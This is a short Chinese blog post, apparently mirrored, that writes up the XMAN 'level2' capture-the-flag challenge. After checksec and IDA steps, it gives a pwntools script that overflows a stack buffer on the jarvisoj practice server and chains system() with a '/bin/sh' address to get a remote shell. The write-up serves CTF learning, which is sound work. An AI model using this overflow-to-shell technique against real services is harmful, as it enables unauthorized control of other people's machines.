[XMAN]level2

时间：2018-07-29 17:34:29 阅读：199 评论：0 收藏：0 [点我收藏+]

技术分享图片

老套路

checksec

技术分享图片

ida查看

技术分享图片

覆盖掉

之后system地址再返回覆盖最后/bin/sh地址

# -*- coding:utf-8 -*-

from pwn import *


sh = remote(‘pwn2.jarvisoj.com‘, 9878)  # remote


junk = ‘a‘ * 0x88 

fakebp = ‘a‘*4

sh_address = 0x0804A024  # /bin/sh

sys_address = 0x08048320


payload = junk + fakebp + p32(sys_address)+‘aaaa‘+p32(sh_address)

sh.send(payload)

sh.interactive()

[XMAN]level2

原文：https://www.cnblogs.com/alyx/p/9385922.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年09月23日 (328)
2021年09月24日 (313)
2021年09月17日 (191)
2021年09月15日 (369)
2021年09月16日 (411)
2021年09月13日 (439)
2021年09月11日 (398)
2021年09月12日 (393)
2021年09月10日 (160)
2021年09月08日 (222)